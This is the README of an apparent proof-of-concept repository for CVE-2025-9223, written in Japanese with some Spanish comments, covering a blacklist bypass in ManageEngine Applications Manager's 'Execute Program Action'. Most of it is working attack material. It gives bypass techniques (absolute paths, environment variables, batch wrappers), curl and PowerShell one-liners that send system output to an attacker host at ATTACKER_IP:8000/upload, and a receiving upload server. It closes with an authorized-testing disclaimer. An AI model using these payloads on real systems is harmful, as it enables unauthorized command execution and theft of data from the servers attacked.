
POC CVE-2025-9223
このリポジトリには、ManageEngine Applications Managerの「Execute Program Action」機能におけるコマンド実行の脆弱性を実証する概念実証(PoC)が含まれています。
Applications Managerは危険なコマンドをブロックするためにブラックリスト(BlackListCommands)を使用していますが、検証には重大な欠陥があります。
| 手法 | 例 |
|---|---|
| 絶対パス | C:\Windows\System32\netstat.exe |
| 環境変数 | %SystemRoot%\System32\netstat.exe |
| スクリプトラッパー | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
スクリプト upload_server.py は、流出したファイルを受信するためのシンプルなHTTPサーバーを提供します。
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: バインドアドレス(デフォルト: 0.0.0.0)--port: HTTPポート(デフォルト: 8000)--dir: 出力ディレクトリ(デフォルト: カレントディレクトリ)| メソッド |
|---|
✅ パストラバーサル対策 ✅ タイムスタンプによる一意なファイル名 ✅ IPとUser-Agentのリクエストログ ✅ コンテンツタイプの検証
test_commands.txt ファイルを作成し、バイパスの例を含めます:
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
重要: このツールは教育目的および許可されたテスト目的のみで提供されています。
❌ 自分の所有していない、または明示的にテストする許可がないシステムでは使用しないでください ❌ 違法行為に使用しないでください ✅ セキュリティ調査のために管理された環境でのみ使用してください ✅ テストを実施する前に適切な許可を取得してください
著者は、このツールの誤用について一切の責任を負いません。ユーザーはすべての責任とリスクを負うものとします。
このプロジェクトは研究および教育目的のみです。All rights reserved.
Johan Aybar - 教育目的
⚠️ 注意: このPoCは許可されたテスト環境でのみ使用してください。無許可での使用は違法となる可能性があり、厳に禁止されています。
| エンドポイント |
|---|
| 説明 |
|---|
| GET | / | 最近アップロードされたファイルの一覧表示 |
| POST | /upload | ファイルのアップロード(multipart/form-data) |
| PUT | /upload/[filename] | ファイルの直接アップロード |